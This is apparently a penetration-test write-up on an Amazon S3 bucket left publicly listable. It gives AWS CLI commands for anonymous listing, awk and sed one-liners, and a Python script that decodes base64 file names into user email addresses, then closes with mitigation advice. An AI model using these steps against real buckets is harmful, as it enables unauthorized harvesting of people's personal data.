Exploiting S3 bucket misconfiguration to dump users emails
This page has writeup about how misconfigured Amazon S3 bucket was found leaking several users email and other docs in public domain.
While pentesting an android application I came across an S3 bucket URL, which was storing user's documents. First thing came on my mind was to first check if this bucket is misconfigured. If it's misconfigured then I'll get complete access to users documents.
Checking If bucket is misconfigured
I'll be using AWS cli because it provides better control over the commands while enumerating buckets and other AWS infra rather than depending on the tools.
Installing AWS cli
$ sudo apt install python3 python3-pip -y
$ pip3 install awscli
Verify Installation
$ aws --version
aws-cli/1.27.45 Python/3.10.6 Linux/5.15.0-57-generic botocore/1.29.45
Checking if bucket is accessible anonymously
To interact with bucket we first need bucket name which can be found from URL, which is usually in format
https://bucket-name.s3.amazonaws.com/
check if bucket is accessible publicly using aws cli
$ aws s3 ls s3://bucket-name --no-sign-request
PRE admin/
PRE bi/
PRE blog/
PRE campanhas/
PRE css/
PRE data/
PRE escolas/
PRE fonts/
PRE front-assets/
PRE front-cache/
PRE img/
PRE lib/
PRE lps/
PRE marketing/
PRE XXXXXXX-tech/
PRE ms-qrcode/
PRE outros/
PRE parcerias/
PRE plugins/
PRE pwa/
PRE redirects/
PRE removals/
PRE sales/
PRE study-plans/
PRE styles/
PRE tech-blog/
PRE tutoriais/
PRE uploads/
PRE video/
PRE wiris-service/
2019-10-29 02:36:17 404 favicon.ico
2022-12-01 00:38:53 96 robots.txt
2022-11-02 20:44:17 59383 sitemap.xml
Bucket is publicly accessible!!
We can enumerate each by going through each and every directory, but in this writeup my focus will be on dumping only users email ids which is due to insecure applicaiton design.
Enumerating Through Directories and Dumping File names
User can enumerate through each and every directory for juicy information, but since from android app pentest I know where I can find user's information. All user uploaded docs are stored in uploads/essay_submission/essay
directory of s3 bucket.
Now I'll be listing all the files inside uploads/essay_submission/essay and storing its output inside a text file.
aws s3 ls s3://bucket-name/uploads/essay_submission/essay/ --no-sign-request > submitted_essays.txt

Let's tail data to understand how files are stored to analyze file names.

The design flaw exists in how are documents/images stored in bucket. All files name are in base64 encoded format allowing attacker to extract email ids from the file names which can be concluded after analyzing the output.
Extracting User Info from Dumped Data
Using awk and sed command line tools to extract only base64 encoded data
tail submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//'

awk
is used to only print file names and sed
allows us to get rid of .jpeg
extension
Now let's extract all base64 encoded data and store it in another file base64data.txt
cat submitted_essays.txt | awk '{print $4}' | sed 's/[.].*$//' > base64data.txt

Decoding base64 Data Line by Line
I won't be using base64 command line utility to decode base64 data because I prefer python for doing such tasks and I can use that script again in future.
from base64 import b64decode
from os.path import isfile
def get_file_lines(file_path:str):
assert isfile(file_path), f"File Not Found: {file_path}"
file_lines = []
with open(file_path, 'r') as f:
file_lines = f.readlines()
file_lines = [ line.strip() for line in file_lines]
return file_lines
def decode_base64_list(file_lines:list[str]):
decoded_lines = []
for line in file_lines:
decoded_lines.append(b64decode(line).decode('utf-8'))
return decoded_lines
def write_file(file_path:str, file_lines:list[str]):
with open(file_path, 'w') as f:
data = '\n'.join(file_lines)
f.write(data)
def main(file_path:str, save_file_path:str):
encoded_file_lines = get_file_lines(file_path)
decoded_file_lines = decode_base64_list(list(set(encoded_file_lines)))
# sanitizing data
## remove ids
sanitized_lines = []
for line in set(decoded_file_lines):
sanitized_lines.append(line[0:-13])
## write unique values to file
write_file(save_file_path, sanitized_lines)
# print some data on completion
print(sanitized_lines[0:4])
if __name__ == '__main__':
file_path = 'base64data.txt'
decoded_file_path = 'user_data.txt'
main(file_path, decoded_file_path)
Running script decode_data.py
python3 decode_data.py

Some data will be printed on screen after script has been executed successfully
Now, we have all user emails those who have uploaded their docs.
tail user_data.txt
wc -l user_data.txt


How to mitigate issue and develop better applications
User data exposed to public due to misconfigured security bucket. Buckets shouldn't be publicly accessible. Use presigned URLs for limited amount of time for accessing bucket object.
It's not secure to use user's details, uniquely indentifiable id for storing user's data instead developers should use uuids or salted hashes to generate names for assets/objects.
Last updated
Was this helpful?